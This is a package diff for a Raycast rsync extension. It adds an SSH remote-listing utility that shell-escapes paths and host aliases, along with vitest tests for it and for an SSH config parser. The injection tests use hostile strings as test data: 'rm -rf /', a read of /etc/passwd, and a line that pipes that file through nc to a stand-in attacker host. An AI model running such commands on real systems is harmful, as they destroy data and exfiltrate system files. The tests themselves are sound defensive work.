raycast-rsync-extension 1.0.1

package/src/utils/ssh.test.ts

@@ -0,0 +1,209 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { SSHHostConfig } from "../types/server";
+import { executeRemoteLs } from "./ssh";
+import { exec } from "child_process";
+
+// Mock the exec function to capture commands
+vi.mock("child_process", () => {
+  const actual = vi.importActual("child_process");
+  return {
+    ...actual,
+    exec: vi.fn(),
+  };
+});
+
+describe("SSH Remote Listing", () => {
+  const mockHostConfig: SSHHostConfig = {
+    host: "testserver",
+    hostName: "example.com",
+    user: "testuser",
+    port: 22,
+  };
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  describe("executeRemoteLs - Command Injection Prevention", () => {
+    it("should escape remotePath to prevent command injection", async () => {
+      const maliciousPath = "/tmp/test; rm -rf /";
+
+      // Mock exec to capture the command
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          // Return success
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, maliciousPath);
+
+      // The malicious command should be escaped, not executed
+      // The path is escaped and then the entire remote command is escaped
+      // So we check that the path appears within the escaped remote command
+      expect(capturedCommand).toMatch(/\/tmp\/test; rm -rf \//);
+      // The semicolon should be inside quotes (part of the escaped string)
+      expect(capturedCommand).toMatch(/'ls -lAh .*\/tmp\/test; rm -rf \/.*'/);
+    });
+
+    it("should escape remotePath with pipe to prevent injection", async () => {
+      const maliciousPath = "/tmp/test | cat /etc/passwd";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, maliciousPath);
+
+      // The malicious command should be escaped
+      // The path is escaped and then the entire remote command is escaped
+      expect(capturedCommand).toMatch(/\/tmp\/test \| cat \/etc\/passwd/);
+      expect(capturedCommand).toMatch(
+        /'ls -lAh .*\/tmp\/test \| cat \/etc\/passwd.*'/,
+      );
+    });
+
+    it("should escape hostAlias to prevent command injection", async () => {
+      const maliciousHostConfig: SSHHostConfig = {
+        host: "server; rm -rf /",
+        hostName: "example.com",
+      };
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(maliciousHostConfig, "/remote/path");
+
+      // The malicious host alias should be escaped
+      expect(capturedCommand).toContain("'server; rm -rf /'");
+    });
+
+    it("should handle paths with spaces", async () => {
+      const pathWithSpaces = "/remote/path with spaces";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, pathWithSpaces);
+
+      // Paths with spaces should be properly escaped
+      // The path is escaped and then the entire remote command is escaped
+      expect(capturedCommand).toMatch(/\/remote\/path with spaces/);
+      expect(capturedCommand).toMatch(
+        /'ls -lAh .*\/remote\/path with spaces.*'/,
+      );
+    });
+
+    it("should handle paths with single quotes", async () => {
+      const pathWithQuotes = "/remote/file'name.txt";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, pathWithQuotes);
+
+      // Paths with single quotes should be properly escaped
+      // The path is escaped (single quotes become '\'') and then the entire remote command is escaped
+      // So we check that the escaped path appears in the command
+      expect(capturedCommand).toMatch(/\/remote\/file.*name\.txt/);
+      // The escaping for single quotes in the path should be present
+      expect(capturedCommand).toMatch(/file.*\\''.*name/);
+    });
+
+    it("should escape complex injection attempts", async () => {
+      const complexInjection =
+        "/tmp/test; cat /etc/passwd | nc attacker.com 1234";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, complexInjection);
+
+      // The entire malicious string should be escaped as a single argument
+      // The path is escaped and then the entire remote command is escaped
+      expect(capturedCommand).toMatch(
+        /\/tmp\/test; cat \/etc\/passwd \| nc attacker\.com 1234/,
+      );
+      expect(capturedCommand).toMatch(
+        /'ls -lAh .*\/tmp\/test; cat \/etc\/passwd \| nc attacker\.com 1234.*'/,
+      );
+    });
+
+    it("should allow tilde expansion for paths starting with ~/", async () => {
+      const tildePath = "~/Desktop/subdir";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, tildePath);
+
+      // The ~ should be outside quotes to allow remote shell expansion
+      // The path after ~/ should be escaped for safety
+      // The command should contain ~/ followed by the escaped path part
+      expect(capturedCommand).toMatch(/~/);
+      expect(capturedCommand).toMatch(/Desktop\/subdir/);
+      // The ~ should not be inside quotes (allowing remote shell to expand it)
+      // The path part should be escaped - the actual pattern is ~/'Desktop/subdir'
+      // which appears as ~/'\\''Desktop/subdir'\\''' in the escaped command
+      expect(capturedCommand).toMatch(/ls -lAh ~\/.*Desktop\/subdir/);
+      // Verify ~ is not inside quotes (it should appear before the escaped path)
+      const match = capturedCommand.match(/ls -lAh (.*)/);
+      expect(match).not.toBeNull();
+      if (match) {
+        const pathPart = match[1];
+        // The ~ should appear before any quotes
+        expect(pathPart).toMatch(/^~/);
+      }
+    });
+
+    it("should handle standalone tilde", async () => {
+      const tildePath = "~";
+
+      let capturedCommand = "";
+      (exec as any).mockImplementation(
+        (command: string, options: any, callback: any) => {
+          capturedCommand = command;
+          callback(null, { stdout: "total 0\n", stderr: "" });
+        },
+      );
+
+      await executeRemoteLs(mockHostConfig, tildePath);
+
+      // Standalone ~ should be unescaped to allow remote shell expansion
+      expect(capturedCommand).toMatch(/ls -lAh ~/);
+      // Should not be inside quotes
+      expect(capturedCommand).not.toMatch(/'~'/);
+    });
+  });
+});

package/src/utils/ssh.ts

@@ -0,0 +1,187 @@
+import { exec } from "child_process";
+import { promisify } from "util";
+import { homedir } from "os";
+import { join } from "path";
+import { SSHHostConfig, RemoteFile } from "../types/server";
+import { shellEscape } from "./shellEscape";
+
+const execAsync = promisify(exec);
+
+/**
+ * Execute ls command on remote server to list files
+ * @param hostConfig - SSH host configuration
+ * @param remotePath - Path to list on remote server
+ * @returns Promise resolving to array of RemoteFile objects
+ */
+/**
+ * Escapes a remote path for use in SSH commands, handling tilde expansion
+ * For paths starting with ~, we allow the remote shell to expand it by not escaping the ~
+ * @param remotePath - The remote path to escape
+ * @returns Escaped path that allows ~ expansion on remote shell
+ */
+function escapeRemotePath(remotePath: string): string {
+  // If path starts with ~/, allow remote shell to expand ~
+  // We escape only the part after ~/ to prevent injection while allowing ~ expansion
+  if (remotePath.startsWith("~/")) {
+    const pathAfterTilde = remotePath.slice(2); // Everything after "~/"
+    // Escape the path part to prevent injection, but keep ~/ unescaped
+    // This will result in ~/'escaped-path' which allows ~ expansion
+    const escapedPath = shellEscape(pathAfterTilde);
+    return `~/${escapedPath}`;
+  }
+  if (remotePath === "~") {
+    // Standalone ~ doesn't need escaping
+    return "~";
+  }
+  // For all other paths, escape normally
+  return shellEscape(remotePath);
+}
+
+export async function executeRemoteLs(
+  hostConfig: SSHHostConfig,
+  remotePath: string,
+): Promise<RemoteFile[]> {
+  const configPath = join(homedir(), ".ssh", "config");
+  const hostAlias = hostConfig.host;
+
+  // Escape all user-provided inputs to prevent command injection
+  const escapedConfigPath = shellEscape(configPath);
+  const escapedHostAlias = shellEscape(hostAlias);
+  // Use special escaping for remote paths to allow ~ expansion
+  const escapedRemotePath = escapeRemotePath(remotePath);
+
+  // Use ls -lAh for detailed listing with human-readable sizes
+  // -l: long format, -A: all files except . and .., -h: human-readable sizes
+  // Construct the remote command with properly escaped remotePath
+  // The remote command is: ls -lAh <escaped-remote-path>
+  // We escape the entire remote command for the local shell
+  const remoteCommand = `ls -lAh ${escapedRemotePath}`;
+  const escapedRemoteCommand = shellEscape(remoteCommand);
+
+  const command = `ssh -F ${escapedConfigPath} ${escapedHostAlias} ${escapedRemoteCommand}`;
+
+  console.log("Executing remote ls:", command);
+
+  try {
+    const { stdout } = await execAsync(command, {
+      timeout: 30000, // 30 second timeout
+    });
+
+    // Parse ls output
+    const files = parseLsOutput(stdout);
+    console.log(`Found ${files.length} files in ${remotePath}`);
+
+    return files;
+  } catch (error) {
+    const errorMessage = parseRemoteLsError(
+      error as {
+        stderr?: string;
+        message?: string;
+        code?: number;
+      },
+    );
+    console.error("Remote ls error:", error);
+    throw new Error(errorMessage);
+  }
+}
+
+/**
+ * Parse ls -lAh output into RemoteFile objects
+ * @param output - stdout from ls command
+ * @returns Array of RemoteFile objects
+ */
+function parseLsOutput(output: string): RemoteFile[] {
+  const lines = output.trim().split("\n");
+  const files: RemoteFile[] = [];
+
+  // Skip the first line if it starts with "total" (summary line)
+  const startIndex = lines[0]?.startsWith("total") ? 1 : 0;
+
+  for (let i = startIndex; i < lines.length; i++) {
+    const line = lines[i].trim();
+    if (!line) continue;
+
+    // Parse ls -l format: permissions links owner group size month day time name
+    // Example: drwxr-xr-x  5 user group 4.0K Jan 13 10:30 dirname
+    const parts = line.split(/\s+/);
+
+    if (parts.length < 9) continue; // Skip malformed lines
+
+    const permissions = parts[0];
+    const size = parts[4];
+    const month = parts[5];
+    const day = parts[6];
+    const time = parts[7];
+    const name = parts.slice(8).join(" "); // Handle filenames with spaces
+
+    // Check if it's a directory (first char is 'd')
+    const isDirectory = permissions.startsWith("d");
+
+    files.push({
+      name,
+      isDirectory,
+      size: isDirectory ? "" : size,
+      permissions,
+      modifiedDate: `${month} ${day} ${time}`,
+    });
+  }
+
+  return files;
+}
+
+/**
+ * Parse error output from remote ls command
+ * @param error - The error object from exec
+ * @returns User-friendly error message
+ */
+function parseRemoteLsError(error: {
+  stderr?: string;
+  message?: string;
+  code?: number;
+}): string {
+  const stderr = error.stderr || "";
+  const message = error.message || "";
+  const combinedError = `${stderr} ${message}`.toLowerCase();
+
+  console.error("Remote ls error details:", {
+    code: error.code,
+    stderr: error.stderr,
+    message: error.message,
+  });
+
+  // Connection errors
+  if (combinedError.includes("connection refused")) {
+    return "Connection refused: The server is not accepting connections.";
+  }
+  if (
+    combinedError.includes("connection timed out") ||
+    combinedError.includes("operation timed out")
+  ) {
+    return "Connection timed out: Unable to reach the server.";
+  }
+  if (combinedError.includes("could not resolve hostname")) {
+    return "Could not resolve hostname: The server address is invalid.";
+  }
+
+  // Authentication errors
+  if (
+    combinedError.includes("permission denied") &&
+    combinedError.includes("publickey")
+  ) {
+    return "Authentication failed: SSH key not accepted.";
+  }
+  if (combinedError.includes("permission denied")) {
+    return "Permission denied: Check your credentials.";
+  }
+
+  // File/directory errors
+  if (combinedError.includes("no such file or directory")) {
+    return "Directory not found: The specified path does not exist on the remote server.";
+  }
+  if (combinedError.includes("not a directory")) {
+    return "Not a directory: The specified path is a file, not a directory.";
+  }
+
+  // Generic fallback
+  return `Failed to list remote files: ${stderr || message || "Unknown error"}`;
+}

package/src/utils/sshConfig.test.ts

@@ -0,0 +1,191 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import * as fs from "node:fs";
+import * as os from "node:os";
+
+// Type definitions for mocked fs module
+type MockedFS = typeof fs & {
+  __setMockFileContent: (content: string) => void;
+  __setMockFileExists: (exists: boolean) => void;
+  __setMockPermissionError: (shouldThrow: boolean) => void;
+};
+
+// Mock modules before importing the module under test
+vi.mock("node:os", async () => {
+  const actual = await vi.importActual<typeof os>("node:os");
+  return {
+    ...actual,
+    homedir: vi.fn(() => "/mock/home"),
+  };
+});
+
+vi.mock("node:fs", async () => {
+  const actual = await vi.importActual<typeof fs>("node:fs");
+  let mockFileContent = "";
+  let mockFileExists = false;
+  let mockThrowPermissionError = false;
+  let mockMtimeMs = Date.now();
+
+  return {
+    ...actual,
+    existsSync: vi.fn(() => mockFileExists),
+    readFileSync: vi.fn(() => {
+      if (mockThrowPermissionError) {
+        const error: NodeJS.ErrnoException = new Error("Permission denied");
+        error.code = "EACCES";
+        throw error;
+      }
+      return mockFileContent;
+    }),
+    statSync: vi.fn(
+      () =>
+        ({
+          mtimeMs: mockMtimeMs,
+        }) as fs.Stats,
+    ),
+    __setMockFileContent: (content: string) => {
+      mockFileContent = content;
+      mockFileExists = true;
+      mockMtimeMs = Date.now(); // Use current time to ensure cache misses
+    },
+    __setMockFileExists: (exists: boolean) => {
+      mockFileExists = exists;
+    },
+    __setMockPermissionError: (shouldThrow: boolean) => {
+      mockThrowPermissionError = shouldThrow;
+    },
+  };
+});
+
+import { parseSSHConfig, getHostConfig, clearCache } from "./sshConfig";
+
+describe("SSH Config Parser", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    clearCache(); // Clear cache between tests
+    (fs as unknown as MockedFS).__setMockFileExists(false);
+    (fs as unknown as MockedFS).__setMockPermissionError(false);
+  });
+
+  it("should parse valid config with single host", () => {
+    const config = `
+Host server1
+  HostName example.com
+  User admin
+  Port 2222
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const hosts = parseSSHConfig();
+    expect(hosts).toHaveLength(1);
+    expect(hosts[0]).toEqual({
+      host: "server1",
+      hostName: "example.com",
+      user: "admin",
+      port: 2222,
+      identityFile: undefined,
+      proxyJump: undefined,
+    });
+  });
+
+  it("should parse config with multiple hosts", () => {
+    const config = `
+Host server1
+  HostName example.com
+  User admin
+
+Host server2
+  HostName test.com
+  User root
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const hosts = parseSSHConfig();
+    expect(hosts).toHaveLength(2);
+    expect(hosts[0].host).toBe("server1");
+    expect(hosts[1].host).toBe("server2");
+  });
+
+  it("should handle multiple aliases per host", () => {
+    const config = `
+Host server1 srv1 s1
+  HostName example.com
+  User admin
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const hosts = parseSSHConfig();
+    expect(hosts).toHaveLength(3);
+    expect(hosts[0].host).toBe("server1");
+    expect(hosts[1].host).toBe("srv1");
+    expect(hosts[2].host).toBe("s1");
+    expect(hosts[0].hostName).toBe("example.com");
+    expect(hosts[1].hostName).toBe("example.com");
+    expect(hosts[2].hostName).toBe("example.com");
+  });
+
+  it("should filter out wildcard hosts", () => {
+    const config = `
+Host *
+  User default
+
+Host server1
+  HostName example.com
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const hosts = parseSSHConfig();
+    expect(hosts).toHaveLength(1);
+    expect(hosts[0].host).toBe("server1");
+  });
+
+  it("should handle comments and empty lines", () => {
+    const config = `
+# This is a comment
+Host server1
+  # Another comment
+  HostName example.com
+  
+  User admin
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const hosts = parseSSHConfig();
+    expect(hosts).toHaveLength(1);
+    expect(hosts[0].hostName).toBe("example.com");
+    expect(hosts[0].user).toBe("admin");
+  });
+
+  it("should return empty array for missing config file", () => {
+    (fs as unknown as MockedFS).__setMockFileExists(false);
+    const hosts = parseSSHConfig();
+    expect(hosts).toEqual([]);
+  });
+
+  it("should find specific host by alias", () => {
+    const config = `
+Host server1
+  HostName example.com
+  User admin
+
+Host server2
+  HostName test.com
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const host = getHostConfig("server1");
+    expect(host).not.toBeNull();
+    expect(host?.host).toBe("server1");
+    expect(host?.hostName).toBe("example.com");
+  });
+
+  it("should return null for non-existent host", () => {
+    const config = `
+Host server1
+  HostName example.com
+`;
+    (fs as unknown as MockedFS).__setMockFileContent(config);
+
+    const host = getHostConfig("nonexistent");
+    expect(host).toBeNull();
+  });
+});